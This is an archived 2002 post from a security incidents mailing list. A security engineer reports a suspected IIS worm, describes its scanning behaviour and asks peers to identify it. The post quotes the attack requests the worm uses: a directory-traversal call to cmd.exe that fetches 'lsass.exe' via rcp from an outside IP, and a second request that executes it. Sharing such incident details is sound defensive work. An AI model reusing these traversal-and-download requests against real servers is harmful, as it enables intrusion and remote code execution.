Security Incidents mailing list archives
new IIS worm? (rcp lsass.exe)
From: cm () coretec at (Christian Mock)
Date: Sat, 21 Sep 2002 20:17:48 +0200
hi, since about a week I notice attempts to exploit vulnerable IIS installations (they show up with snort's "WEB-IIS multiple decode attempt" signature) that seems to try and load an "lsass.exe" file via rcp. As a search of google and securityfocus turned up nothing, I'll throw in what I gathered so far and ask if anybody can identify this: (it seems the affected customer's systems weren't vulnerable, so I don't know what the worm's further actions are). The first part is a SYN scan for port 80, with the source port set to 80, differing ACK numbers, but the same ISN. Interestingly, it iterates over the 3rd IP address octet first, and the 4th later, probably to make the scan on the single /24 slower and less noticeable (in the case I've seen, it has some 30 seconds between packets to consecutive addresses). Then it seems to go after the web servers, sending the following: GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0.. and GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0 I've been able to get hold of that lsass.exe binary (9728 bytes), but I lack the skills to analyze it; I'll happily mail it to anybody who asks. Yes, and the IP addresse doing the scanning + exploit attempts is different from the one which provides lsass.exe; the scanning machine seems to be a solaris 2.7 default install, the rcp-server seems to be solaris 2.8. regards, cm. -- Christian Mock Wiedner Hauptstrasse 15 Senior Security Engineer 1040 Wien CoreTEC IT Security Solutions GmbH +43-1-5037273
Attachment:
signature.ng
Description:
Current thread:
- new IIS worm? (rcp lsass.exe) Christian Mock (Sep 22)
- Re: new IIS worm? (rcp lsass.exe) Björn Wallentinus (Sep 22)
- Re: new IIS worm? (rcp lsass.exe) Michael Thompson (Sep 23)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 23)
- Re: new IIS worm? (rcp lsass.exe) Lasse Sundström (Sep 24)
- Re: new IIS worm? (rcp lsass.exe) Nick FitzGerald (Sep 23)
- <Possible follow-ups>
- Re: new IIS worm? (rcp lsass.exe) Mike Lewinski (Sep 23)
- Re: new IIS worm? (rcp lsass.exe) pj (Sep 24)
- RE: new IIS worm? (rcp lsass.exe) Bellenger, Bruno (Paris) (Sep 24)
- Slapper worm DoS james (Sep 24)
(Thread continues...)